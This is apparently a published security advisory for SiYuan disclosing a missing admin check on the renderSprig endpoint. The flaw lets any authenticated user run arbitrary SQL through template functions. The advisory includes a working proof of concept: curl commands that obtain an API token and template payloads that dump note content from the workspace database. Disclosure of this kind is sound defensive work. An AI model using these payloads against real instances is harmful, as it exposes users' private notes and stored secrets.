Launch Week Day 1: Announcing Security Design Review
Start for Free
MEDIUM 6.5 Go

SiYuan's renderSprig has a missing admin check that allows any user to read full workspace DB

GHSA-4j3x-hhg2-fm2x · CVE-2026-32704 · GO-2026-4700

Published · Modified

Description

Summary

POST /api/template/renderSprig lacks model.CheckAdminRole, allowing any authenticated user to execute arbitrary SQL queries against the SiYuan workspace database and exfiltrate all note content, metadata, and custom attributes.

Details

File: kernel/api/router.go

Every sensitive endpoint in the codebase uses model.CheckAuth + model.CheckAdminRole, but renderSprig only has CheckAuth:

//  Missing CheckAdminRole
ginServer.Handle("POST", "/api/template/renderSprig",
    model.CheckAuth, renderSprig)

//  Correct pattern used by all other data endpoints
ginServer.Handle("POST", "/api/template/render",
    model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, renderTemplate)

renderSprig calls model.RenderGoTemplate (kernel/model/template.go) which registers SQL functions from kernel/sql/database.go:

(*templateFuncMap)["querySQL"] = func(stmt string) (ret []map[string]interface{}) {
    ret, _ = Query(stmt, 1024)  // executes raw SELECT, no role check
    return
}

Any authenticated user - including Publish Service Reader role accounts - can call this endpoint and execute arbitrary SELECT queries.

PoC

Environment:

docker run -d --name siyuan -p 6806:6806 \
  -v $(pwd)/workspace:/siyuan/workspace \
  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123

Exploit:

# Step 1: Login and retrieve API token
curl -s -X POST http://localhost:6806/api/system/loginAuth \
  -H "Content-Type: application/json" \
  -d '{"authCode":"test123"}' -c /tmp/siy.cookie

sleep 15  # wait for boot

TOKEN=$(curl -s -X POST http://localhost:6806/api/system/getConf \
  -b /tmp/siy.cookie -H "Content-Type: application/json" -d '{}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['data']['conf']['api']['token'])")

# Step 2: Execute SQL as non-admin user
curl -s -X POST http://localhost:6806/api/template/renderSprig \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"template":"{{querySQL \"SELECT count(*) as n FROM blocks\" | toJson}}"}'

Confirmed response on v3.6.0:

{"code":0,"msg":"","data":"[{\"n\":0}]"}

Full note dump:

curl -s -X POST http://localhost:6806/api/template/renderSprig \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"template":"{{range $r := (querySQL \"SELECT hpath,content FROM blocks LIMIT 100\")}}{{$r.hpath}}: {{$r.content}}\n{{end}}"}'

Impact

Any authenticated user (API token holder, Publish Service Reader) can:

  • Dump all note content and document hierarchy from the workspace
  • Exfiltrate tags, custom attributes, block IDs, and timestamps
  • Search notes for stored passwords, API keys, or personal data
  • Enumerate all notebooks and their structure

This is especially severe in shared or enterprise deployments where lower-privilege accounts should not have access to other users' notes.

References

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes